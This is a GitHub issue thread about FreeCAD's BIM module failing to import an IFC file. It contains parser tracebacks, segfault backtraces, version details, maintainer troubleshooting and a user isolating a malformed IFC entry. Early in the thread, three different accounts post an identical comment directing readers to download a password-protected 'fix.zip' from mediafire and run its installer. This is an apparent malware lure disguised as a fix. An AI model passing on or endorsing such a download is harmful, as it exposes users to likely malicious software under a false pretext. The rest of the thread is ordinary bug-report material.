FreeCAD/FreeCAD #16063: Default Building: Unexpected 'f' at offset 817790

Mannshoch, 2024-08-26:
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Problem description

[image]
 - Could not provide the File

```
09:06:07  pyException: Traceback (most recent call last):
  File "/snap/freecad/1116/usr/Mod/BIM/nativeifc/ifc_objects.py", line 136, in execute
    ifc_generator.generate_geometry(obj, cached=cached)
  File "/snap/freecad/1116/usr/Mod/BIM/nativeifc/ifc_generator.py", line 77, in generate_geometry
    node, placement = generate_coin(ifcfile, elements, cached)
  File "/snap/freecad/1116/usr/Mod/BIM/nativeifc/ifc_generator.py", line 204, in generate_coin
    elements = [e for e in elements if getattr(e, "Representation", None)]
  File "/snap/freecad/1116/usr/Mod/BIM/nativeifc/ifc_generator.py", line 204, in <listcomp>
    elements = [e for e in elements if getattr(e, "Representation", None)]
  File "/snap/freecad/1116/lib/python3.10/site-packages/ifcopenshell/entity_instance.py", line 186, in __getattr__
    return entity_instance.wrap_value(self.wrapped_data.get_argument(idx), self.wrapped_data.file)
  File "/snap/freecad/1116/lib/python3.10/site-packages/ifcopenshell/ifcopenshell_wrapper.py", line 6510, in get_argument
    return _ifcopenshell_wrapper.entity_instance_get_argument(self, *args)
<class 'RuntimeError'>: Unexpected 'f' at offset 817790
09:06:07  Default Building: Unexpected 'f' at offset 817790
09:06:07  Imported Haus.IFC ( 4.01 Mb ) in 00:00
```

IFC Header
```
ISO-10303-21;
HEADER;
FILE_DESCRIPTION (( 'IFC4' ),'2;1' );
FILE_NAME ('Haus.IFC',
     '2023-06-06T11:06:02',
    ( '' ),
    ( '' ),
    'SwIFC',
    'SolidWorks 2023',
    '' );
FILE_SCHEMA (( 'IFC4' ));
ENDSEC;

DATA;
#1 = IFCPROJECT ( '17AucL3ObBPhtmvsbZQNch',#2,'Default Project','','','','', (#8),#15 ) ;
#2 = IFCOWNERHISTORY ( #5,#6, $,.ADDED.,1686049563,#5,#6,1686049563 ) ;
#3 = IFCPERSON ( '', '', '', $,$,$,$,$ ) ;
#4 = IFCORGANIZATION ( '', ' ','',$,$ ) ;
#5 = IFCPERSONANDORGANIZATION ( #3 ,#4 ,$ ) ;
#6 = IFCAPPLICATION (#7,'19.0','SolidWorks 2019','SolidWorks' ) ;
#7 = IFCORGANIZATION ( 'SW', 'SolidWorks ','SolidWorks',$,$ ) ;
...
```

### Full version info

```shell
OS: Ubuntu Core 22 (ubuntu:GNOME/ubuntu)
Word size of FreeCAD: 64-bit
Version: 0.22.0dev.38516 (Git) Snap 1116
Build type: Release
Branch: main
Hash: 46a84da571d51b135e16ac4731baaf67c552d791
Python 3.10.12, Qt 5.15.10, Coin 4.0.0, Vtk 7.1.1, OCC 7.7.1
Locale: German/Switzerland (de_CH)
Installed mods: 
  * PieMenu 1.7.6
```

### Subproject(s) affected?

BIM

### Anything else?

Appeared after solving:   https://github.com/FreeCAD/FreeCAD/issues/15436
I get another Error If I open this IFC with other open settings

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

seeronline, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

qlqw233, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

luzpaz, 2024-08-27:
@paullee0 do you mind confirming ?

paullee0, 2024-08-27:
Cannot confirm, I use http://www.ifcwiki.org/images/0/09/KIT-Bridge.zip and have other error -

```
 06:51:17  pyException: Traceback (most recent call last):
  File "<string>", line 5, in <module>
  File "/home/paullee/Downloads/FreeCAD/FreeCAD_0.22_pre/FreeCAD_weekly-builds-38506-conda-Linux-x86_64-py311/squashfs-root/usr/Mod/BIM/nativeifc/ifc_import.py", line 86, in insert
    prj_obj = ifc_tools.create_document_object(
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/paullee/Downloads/FreeCAD/FreeCAD_0.22_pre/FreeCAD_weekly-builds-38506-conda-Linux-x86_64-py311/squashfs-root/usr/Mod/BIM/nativeifc/ifc_tools.py", line 92, in create_document_object
    ifcfile, project, full = setup_project(obj, filename, shapemode, silent)
                             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/paullee/Downloads/FreeCAD/FreeCAD_0.22_pre/FreeCAD_weekly-builds-38506-conda-Linux-x86_64-py311/squashfs-root/usr/Mod/BIM/nativeifc/ifc_tools.py", line 156, in setup_project
    ifcfile = ifcopenshell.open(filename)
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/paullee/Downloads/FreeCAD/FreeCAD_0.22_pre/FreeCAD_weekly-builds-38506-conda-Linux-x86_64-py311/squashfs-root/usr/lib/python3.11/site-packages/ifcopenshell/__init__.py", line 138, in open
    raise exc(msg)
<class 'ifcopenshell.SchemaError'>: Unsupported schema: IFC4X2
```

[image]

```
OS: Fedora Linux 40 (Workstation Edition) (GNOME/gnome)
Word size of FreeCAD: 64-bit
Version: 0.22.0dev.38506 (Git)
Build type: Release
Branch: main
Hash: ebf02483af225b502fccfa7111499dfde33999fd
Python 3.11.9, Qt 5.15.13, Coin 4.0.2, Vtk 9.2.6, OCC 7.7.2
Locale: English/United States (en_US)
Installed mods: 
  * Link to SketchArchPlus
```

paullee0, 2024-08-27:
Same in latest git -

```
07:03:25  pyException: Traceback (most recent call last):
  File "<string>", line 5, in <module>
  File "/tmp/.mount_FreeCAr8J1XL/usr/Mod/BIM/nativeifc/ifc_import.py", line 86, in insert
    prj_obj = ifc_tools.create_document_object(
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/tmp/.mount_FreeCAr8J1XL/usr/Mod/BIM/nativeifc/ifc_tools.py", line 92, in create_document_object
    ifcfile, project, full = setup_project(obj, filename, shapemode, silent)
                             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/tmp/.mount_FreeCAr8J1XL/usr/Mod/BIM/nativeifc/ifc_tools.py", line 156, in setup_project
    ifcfile = ifcopenshell.open(filename)
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/tmp/.mount_FreeCAr8J1XL/usr/lib/python3.11/site-packages/ifcopenshell/__init__.py", line 138, in open
    raise exc(msg)
<class 'ifcopenshell.SchemaError'>: Unsupported schema: IFC4X2
```

```
OS: Fedora Linux 40 (Workstation Edition) (GNOME/gnome)
Word size of FreeCAD: 64-bit
Version: 0.22.0dev.38553 (Git) AppImage
Build type: Release
Branch: main
Hash: 59c1ccec3e6b70f56eeee8f94d361019b84bd850
Python 3.11.9, Qt 5.15.13, Coin 4.0.2, Vtk 9.2.6, OCC 7.7.2
Locale: English/United States (en_US)
Installed mods: 
  * Link to SketchArchPlus
```

Mannshoch, 2024-08-28:
This one is an error i had only with a file I'm not allowed to share. 
I also had other errors with KIT Bridge.
they are mentioned in:
https://github.com/FreeCAD/FreeCAD/issues/16064 - Kit Bridge and my file
and
https://github.com/FreeCAD/FreeCAD/issues/16065 - Kitbridge only.

yorikvanhavre, 2024-09-03:
For the unexpected 'f' issue: If we cannot see the file and cannot reproduce the problem with another file, it's impossible to fix, as we cannot know what the problem is

For the unsupported IFC4x2 schema. It's weird, it is supported by IfcOpenShell:
[image]
It might be a problem of the snap package... Can you try this in the FreeCAD python console?
```python
import ifcopenshell
ifcopenshell.version
ifcopenshell.ifcopenshell_wrapper.schema_names()
```

Mannshoch, 2024-09-03:
I updated FreeCAD this morning.
```
OS: Ubuntu Core 22 (ubuntu:GNOME/ubuntu)
Word size of FreeCAD: 64-bit
Version: 0.22.0dev.38624 (Git) Snap 1124
Build type: Release
Branch: main
Hash: 941656bcd3f82f147c9b8e1d8840f8c463858b06
Python 3.10.12, Qt 5.15.10, Coin 4.0.0, Vtk 7.1.1, OCC 7.7.1
Locale: German/Switzerland (de_CH)
Installed mods: 
  * PieMenu 1.8.0
```

```
>>> ifcopenshell.version
'0.8.0'
>>> ifcopenshell.ifcopenshell_wrapper.schema_names()
('IFC2X3', 'IFC4', 'IFC4X1', 'IFC4X2', 'IFC4X3', 'IFC4X3_ADD1', 'IFC4X3_ADD2', 'IFC4X3_TC1')
>>>
```

Now If I open the File FreeCAD crash directly

```
FreeCAD 0.22.0, Libs: 0.22.0devR38624 (Git)
© Juergen Riegel, Werner Mayer, Yorik van Havre and others 2001-2024
FreeCAD is free and open-source software licensed under the terms of LGPL2+ license.
FreeCAD wouldn't be possible without FreeCAD community.
  #####                 ####  ###   ####  
  #                    #      # #   #   # 
  #     ##  #### ####  #     #   #  #   # 
  ####  # # #  # #  #  #     #####  #   # 
  #     #   #### ####  #    #     # #   # 
  #     #   #    #     #    #     # #   #  ##  ##  ##
  #     #   #### ####   ### #     # ####   ##  ##  ##

Adding snap-specific PYTHONPATH to sys.path: /home/USER/snap/freecad/common/.local/lib/python3.10/site-packages:/snap/freecad/1124/lib/python3.10/site-packages:/snap/freecad/1124/usr/lib/python3/dist-packages
Qt: Session management error: Could not open network socket
connect failed: No such file or directory
Program received signal SIGSEGV, Segmentation fault.
#0  /lib/x86_64-linux-gnu/libc.so.6(+0x42520) [0x7c00f7e29520]
#1  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyErr_GetTopmostException+0x4) [0x7c00f9865f94]
#2  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyErr_SetObject+0x56) [0x7c00f98672e6]
#3  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyErr_SetString+0x28) [0x7c00f9867598]
#4  /snap/freecad/1124/lib/python3.10/site-packages/ifcopenshell/_ifcopenshell_wrapper.cpython-310-x86_64-linux-gnu.so(+0x2c86741) [0x7c00a1b1d741]
#5  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x12868e) [0x7c00f97b968e]
#6  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyEval_EvalFrameDefault+0x9d68) [0x7c00f970c9c8]
#7  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x1c23af) [0x7c00f98533af]
#8  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyEval_EvalFrameDefault+0x9d68) [0x7c00f970c9c8]
#9  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x1c23af) [0x7c00f98533af]
#10  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyEval_EvalFrameDefault+0x9d68) [0x7c00f970c9c8]
#11  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x1c23af) [0x7c00f98533af]
#12  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyEval_EvalFrameDefault+0x69de) [0x7c00f970963e]
#13  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x1c23af) [0x7c00f98533af]
#14  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyEval_EvalFrameDefault+0x9d68) [0x7c00f970c9c8]
#15  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x1c23af) [0x7c00f98533af]
#16  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyEval_EvalFrameDefault+0x6808) [0x7c00f9709468]
#17  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x1c23af) [0x7c00f98533af]
#18  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyEval_EvalFrameDefault+0x9d68) [0x7c00f970c9c8]
#19  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x1c23af) [0x7c00f98533af]
#20  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(PyEval_EvalCode+0xbe) [0x7c00f984e3de]
#21  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x20c4cd) [0x7c00f989d4cd]
#22  /snap/freecad/1124/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(PyRun_StringFlags+0x79) [0x7c00f989e4f9]
#23  0x7c00f9db704c in Base::InterpreterSingleton::runString[abi:cxx11](char const*) from /snap/freecad/1124/usr/lib/libFreeCADBase.so+0x6c
#24  0x7c00facfa57c in Gui::Command::_runCommand(char const*, int, Gui::Command::DoCmd_Type, char const*) from /snap/freecad/1124/usr/lib/libFreeCADGui.so+0x8c
#25  0x7c00fabd043e in Gui::Application::open(char const*, char const*) from /snap/freecad/1124/usr/lib/libFreeCADGui.so+0x31e
#26  0x7c00face6579 in Gui::RecentFilesAction::activateFile(int) from /snap/freecad/1124/usr/lib/libFreeCADGui.so+0x269
#27  0x7c00fad00e66 in Gui::Command::_invoke(int, bool) from /snap/freecad/1124/usr/lib/libFreeCADGui.so+0x246
#28  0x7c00fad01326 in Gui::Command::invoke(int, Gui::Command::TriggerSource) from /snap/freecad/1124/usr/lib/libFreeCADGui.so+0x126
[... 10 lines cut ...]
#39  0x7c00fac9eba8 in Gui::GUIApplication::notify(QObject*, QEvent*) from /snap/freecad/1124/usr/lib/libFreeCADGui.so+0x98
#40  0x7c00f852ee4a in QCoreApplication::notifyInternal2(QObject*, QEvent*) from /snap/freecad/1124/kf5/usr/lib/x86_64-linux-gnu/libQt5Core.so.5+0x13a
#41  0x7c00f90cee87 in QApplicationPrivate::sendMouseEvent(QWidget*, QMouseEvent*, QWidget*, QWidget*, QWidget**, QPointer<QWidget>&, bool, bool) from /snap/freecad/1124/kf5/usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5+0x1b7
#42  /snap/freecad/1124/kf5/usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5(+0x1c9d2b) [0x7c00f9125d2b]
[... cut ...]
#56  0x7c00fabda0e8 in Gui::Application::runApplication() from /snap/freecad/1124/usr/lib/libFreeCADGui.so+0x6c8
#57  /snap/freecad/1124/usr/bin/FreeCAD(+0xa781) [0x5623eb188781]
#58  /lib/x86_64-linux-gnu/libc.so.6(+0x29d90) [0x7c00f7e10d90]
#59  /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0x80) [0x7c00f7e10e40]
#60  /snap/freecad/1124/usr/bin/FreeCAD(+0xab45) [0x5623eb188b45]
```

It's not the best casee that I could not provide the file. But If  you give me advise - I'm not a developer - I help as I can.

yorikvanhavre, 2024-09-03:
Ok then the schema problem was just due to an older version of ifcopenshell, good to know.

Now there is indeed another problem there, but without seeing the file it's impossible to know exactly what. The only thing we can deduce from the backtrace is that ifcopenshell crashed when opening the file, but it does not say what.

There are several things you can try, for ex:
1. Opening the file in another IFC viewer application (for ex. Ifcplusplus, it's in the ubuntu repo)
2. Try opening the file in pure ifcopenshell, in the FreeCAD python console:
```python
import ifcopenshell
ifcfile = ifcopenshell.open("/path/to/your/file.ifc)
print ifcfile.by_type("IfcWall")
```
3. Try to export a smaller subset of objects, see if the error persists, until you have a file that opens correctly, then try to figure out what causes the problem

Mannshoch, 2024-09-03:
OK I assume the Problem is not FreeCAD but ifcopenshell

I downloaded ifcconvert v7 and v8

output on ifcconvert.exe v7:
```
IfcOpenShell IfcConvert v0.7.0-f7c03db75 (OCC 7.5.3)
Scanning file...
Done scanning file
Parsing input file took 0 seconds
Creating geometry...
Done creating geometry (12 objects)

Log:
[Error] [2024-09-03 17:04:00] Unexpected 'f' at offset 817790

Conversion took 4 seconds
```
And a working STP is made.

the same on ifcconvert.exe v8
```
IfcOpenShell IfcConvert 0.8.0 (OCC 7.5.3)
Scanning file...
#10000
```
no file is created.

For the record, the file open without problem in [Bimviewer](https://bimvision.eu/de/)
[image]

yorikvanhavre, 2024-09-04:
Yes clearly an issue with IfcOpenShell.

Still, if you have the patience to debug further, it's always super useful to fix bugs in IfcOpenShell.
Only, there will be no way for them to fix either, if they don't see the file.

So I would say what's needed here would be to produce a minimal file that shows the problem, that you are able to share. Maybe try removing as many objects as possible so that the file is not recognizable anymore, but still present the error? Not sure how doable that is, of course...

Mannshoch, 2024-10-03:
Information: If I see it correct, Something was made by IFC-Openshell. It seems not in FreeCAD at moment. 

If I test the current Build with the wrong IFC-File FreeCAd still crash. I'm not sure here but may crashing the whole application should not be in that case and may need as separate look.

If I import the by text editor corrected IFC, I get:
```
11:28:19  pyException: Traceback (most recent call last):
  File "/snap/freecad/1153/usr/local/lib/python3.10/dist-packages/freecad/module_io.py", line 12, in OpenInsertObject
    except PyExc_FC_AbortIOException:
<class 'NameError'>: name 'PyExc_FC_AbortIOException' is not defined
```
I assume [this one](https://github.com/IfcOpenShell/IfcOpenShell/issues/5302#issuecomment-2331124730) may the problem.

yorikvanhavre, 2024-10-03:
A fix was indeed issued on IfcOpenShell. However, one must wait until the version available in the snap package is updated too. If I'm not mistaken it's the conda version, you can keep an eye on https://anaconda.org/conda-forge/ifcopenshell and see when the "Last upload" field changes...

There is no action to be taken on the FreeCAD side I believe, so I'll close this issue. Don't hesitate to reopen if needed!

closed 2024-10-03 by yorikvanhavre

furgo16, 2024-10-03:
Great. The ifcopenshell version in the snap package comes from the PyPi archive at https://pypi.org/project/ifcopenshell/#history

They tend to release what I believe to be a git snapshot roughly every month, although the last two seem to have had proper release versioning.

Mannshoch, 2024-10-04:
@yorikvanhavre What do you think about the case that IFC-OpenShell could kill the whole FreeCAD?
I know that will not happen anymore in the future but may the possibility that IFC-OpenShell could kill FreeCAD may need a closer look.

yorikvanhavre, 2024-10-04:
IfcOpenShell can indeed in theory cause FreeCAD to crash, because it raises errors very often. That's how IfcOpenShell is designed (raise errors when anything is wrong), it makes a lot of sense for a library, so programmers can see the errors and fix the problems. However, both FreeCAD and Python have pretty good error handling, and in my experience it's very very rare that IfcOpenShell actually causes a crash.

Most of the time it produces errors, like in this report. This is a good thing, it allows us to find the problem and fix it :)

Mannshoch, 2024-10-04:
I attached you an example that lets Crash FreeCAD.

Cause of my Crash is this line in my IFC File:
`#10565 = IFCBUILDINGELEMENTPROXY ( '0LhvikQPL3yAPWgZoKt7o$',#2,'Grundst\X2\00fc\X0\ck_Grundstück','','Grundst\X2\00fc\X0\ck_Grundstück',#10567,#10566,'6A899D20-9001-4FD3-9A-EB-5E88A7396E9E',.ELEMENT. ) ;`

I took that string `Grundst\X2\00fc\X0\ck_Grundstück','','Grundst\X2\00fc\X0\ck_Grundstück',#10567,#10566,'6A899D20-9001-4FD3-9A-EB-5E88A7396E9E',.ELEMENT.` and replaced a correct entry at line 920 in the attached ifc. Now FreeCAD crash if I open this IFC.

[BIMExample-Site.ifc.zip](https://github.com/user-attachments/files/17259115/BIMExample-Site.ifc.zip)

paullee0, 2024-10-04:
@Mannshoch 

No crash for me with 1.0.0 RC2 AppImage on Fedora 40, but error message - 

```
OS: Fedora Linux 40 (Workstation Edition) (GNOME/gnome)
Word size of FreeCAD: 64-bit
Version: 1.0.0RC2.38806 (Git)
Build type: Release
Branch: (HEAD detached at 1.0rc2)
Hash: 3d63fc6c2f665a8d5e6468845a419bcac80756c7
Python 3.11.9, Qt 5.15.13, Coin 4.0.3, Vtk 9.2.6, OCC 7.7.2
Locale: English/United States (en_US)
Stylesheet/Theme/QtStyle: unset/FreeCAD Classic/Qt default
Installed mods: 
```
  * Link to SketchArchLite

```
21:38:13  IFC: Created #159: IfcElementAssembly, 'Walls'
21:38:13  Changing IFC attribute value of AssemblyPlace: NOTDEFINED
21:38:13  Changing IFC attribute value of PredefinedType: NOTDEFINED
21:38:13  IFC: Created #518: IfcElementAssembly, 'Slabs'
21:38:13  Changing IFC attribute value of AssemblyPlace: NOTDEFINED
21:38:13  Changing IFC attribute value of PredefinedType: NOTDEFINED
21:38:13  pyException: Traceback (most recent call last):
  File "/home/paullee/Downloads/FreeCAD/FreeCAD_0.22_pre/FreeCAD_1.0.0RC2-conda-Linux-x86_64-py311/squashfs-root/usr/lib/python3.11/site-packages/freecad/module_io.py", line 12, in OpenInsertObject
    except PyExc_FC_AbortIOException:
           ^^^^^^^^^^^^^^^^^^^^^^^^^
<class 'NameError'>: name 'PyExc_FC_AbortIOException' is not defined
```

Mannshoch, 2024-10-07:
```
FreeCAD 1.1.0, Libs: 1.1.0devR38898 (Git)
(C) 2001-2024 FreeCAD contributors
FreeCAD is free and open-source software licensed under the terms of LGPL2+ license.

Adding snap-specific PYTHONPATH to sys.path: /home/user/snap/freecad/common/.local/lib/python3.10/site-packages:/snap/freecad/1158/lib/python3.10/site-packages:/snap/freecad/1158/usr/lib/python3/dist-packages
Qt: Session management error: Could not open network socket
connect failed: No such file or directory
Program received signal SIGSEGV, Segmentation fault.
#0  /lib/x86_64-linux-gnu/libc.so.6(+0x42520) [0x710767b90520]
#1  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyErr_GetTopmostException+0x4) [0x7107695cdf94]
#2  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyErr_SetObject+0x56) [0x7107695cf2e6]
#3  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyErr_SetString+0x28) [0x7107695cf598]
#4  /snap/freecad/1158/lib/python3.10/site-packages/ifcopenshell/_ifcopenshell_wrapper.cpython-310-x86_64-linux-gnu.so(+0x2c86741) [0x71070db1d741]
#5  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x12868e) [0x71076952168e]
#6  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyEval_EvalFrameDefault+0x9d68) [0x7107694749c8]
#7  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x1c23af) [0x7107695bb3af]
#8  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyEval_EvalFrameDefault+0x9d68) [0x7107694749c8]
#9  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x1c23af) [0x7107695bb3af]
#10  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyEval_EvalFrameDefault+0x9d68) [0x7107694749c8]
#11  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x1c23af) [0x7107695bb3af]
#12  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyEval_EvalFrameDefault+0x69de) [0x71076947163e]
#13  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x1c23af) [0x7107695bb3af]
#14  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyEval_EvalFrameDefault+0x9d68) [0x7107694749c8]
#15  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x1c23af) [0x7107695bb3af]
#16  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyEval_EvalFrameDefault+0x6808) [0x710769471468]
#17  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x1c23af) [0x7107695bb3af]
#18  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyEval_EvalFrameDefault+0x4b16) [0x71076946f776]
#19  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x1c23af) [0x7107695bb3af]
#20  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(_PyEval_EvalFrameDefault+0x9d68) [0x7107694749c8]
#21  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x1c23af) [0x7107695bb3af]
#22  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(PyEval_EvalCode+0xbe) [0x7107695b63de]
#23  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(+0x20c4cd) [0x7107696054cd]
#24  /snap/freecad/1158/usr/lib/x86_64-linux-gnu/libpython3.10.so.1.0(PyRun_StringFlags+0x79) [0x7107696064f9]
#25  0x710769b1f18c in Base::InterpreterSingleton::runString[abi:cxx11](char const*) from /snap/freecad/1158/usr/lib/libFreeCADBase.so+0x6c
#26  0x71076aa6a7cc in Gui::Command::_runCommand(char const*, int, Gui::Command::DoCmd_Type, char const*) from /snap/freecad/1158/usr/lib/libFreeCADGui.so+0x8c
#27  0x71076a94199c in Gui::Application::open(char const*, char const*) from /snap/freecad/1158/usr/lib/libFreeCADGui.so+0x1ec
#28  0x71076aa7e8b0 in StdCmdOpen::activated(int) from /snap/freecad/1158/usr/lib/libFreeCADGui.so+0x6f0
#29  0x71076aa710b6 in Gui::Command::_invoke(int, bool) from /snap/freecad/1158/usr/lib/libFreeCADGui.so+0x246
#30  0x71076aa71576 in Gui::Command::invoke(int, Gui::Command::TriggerSource) from /snap/freecad/1158/usr/lib/libFreeCADGui.so+0x126
#31  /snap/freecad/1158/kf5/usr/lib/x86_64-linux-gnu/libQt5Core.so.5(+0x2f48f4) [0x7107682ce8f4]
#32  0x710768e29c26 in QAction::triggered(bool) from /snap/freecad/1158/kf5/usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5+0x46
#33  0x710768e2c91c in QAction::activate(QAction::ActionEvent) from /snap/freecad/1158/kf5/usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5+0xac
#34  /snap/freecad/1158/kf5/usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5(+0x26496a) [0x710768f2896a]
#35  0x710768f28ac7 in QAbstractButton::mouseReleaseEvent(QMouseEvent*) from /snap/freecad/1158/kf5/usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5+0xf7
#36  0x71076902774e in QToolButton::mouseReleaseEvent(QMouseEvent*) from /snap/freecad/1158/kf5/usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5+0xe
#37  0x710768e7394e in QWidget::event(QEvent*) from /snap/freecad/1158/kf5/usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5+0x20e
#38  0x710768e30763 in QApplicationPrivate::notify_helper(QObject*, QEvent*) from /snap/freecad/1158/kf5/usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5+0x83
#39  0x710768e383a4 in QApplication::notify(QObject*, QEvent*) from /snap/freecad/1158/kf5/usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5+0xa84
#40  0x71076aa0ece0 in Gui::GUIApplication::notify(QObject*, QEvent*) from /snap/freecad/1158/usr/lib/libFreeCADGui.so+0xd0
#41  0x710768296e4a in QCoreApplication::notifyInternal2(QObject*, QEvent*) from /snap/freecad/1158/kf5/usr/lib/x86_64-linux-gnu/libQt5Core.so.5+0x13a
[... cut ...]
#56  0x71076829dd14 in QCoreApplication::exec() from /snap/freecad/1158/kf5/usr/lib/x86_64-linux-gnu/libQt5Core.so.5+0x94
#57  0x71076a94a028 in Gui::Application::runApplication() from /snap/freecad/1158/usr/lib/libFreeCADGui.so+0x6c8
#58  /snap/freecad/1158/usr/bin/FreeCAD(+0xa791) [0x5ff84c287791]
#59  /lib/x86_64-linux-gnu/libc.so.6(+0x29d90) [0x710767b77d90]
#60  /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0x80) [0x710767b77e40]
#61  /snap/freecad/1158/usr/bin/FreeCAD(+0xab55) [0x5ff84c287b55]

```